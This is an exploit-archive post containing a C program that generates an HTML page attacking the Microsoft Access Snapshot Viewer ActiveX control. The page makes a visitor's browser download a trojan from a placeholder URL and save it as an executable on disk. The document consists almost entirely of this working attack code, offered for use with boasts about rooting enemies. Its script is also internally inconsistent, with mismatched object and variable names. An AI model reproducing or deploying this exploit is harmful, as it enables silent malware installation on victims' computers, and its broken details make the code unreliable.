Home / exploits msaccess-activex.txt
Posted on 24 July 2008
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0 Download nice binaries into an arbitrary box Vulnerability discovered by Oliver Lavery http://www.securityfocus.com/bid/8536/info Remote: Yes greetz to str0ke */ #include <stdio.h> #include <stdlib.h> #define Filename "Ms-Access-SnapShot.html" FILE *File; char data[] = "<html> <objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object> " "<script language='javascript'> var arbitrary_file = 'http://path_to_trojan' " "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe' attack.SnapshotPath = arbitrary_file " "attack.CompressedPath = destination attack.PrintSnapshot(arbitrary_file,destination) " "<script> <html>"; int main () { printf("**Microsoft Access Snapshot Viewer ActiveX Exploit** "); printf("**c0ded by callAX** "); printf("**r00t your enemy .| **"); FILE *File; char *b0fer; if ( (File = fopen(Filename,"w+b")) == NULL ) { printf(" fopen() error"); exit(1); } b0fer = (char*)malloc(strlen(data)); memcpy(b0fer,data,sizeof(data)-1); fwrite(b0fer, strlen(data), 1,File); fclose(File); printf(" " Filename " has been created. "); return 0; }
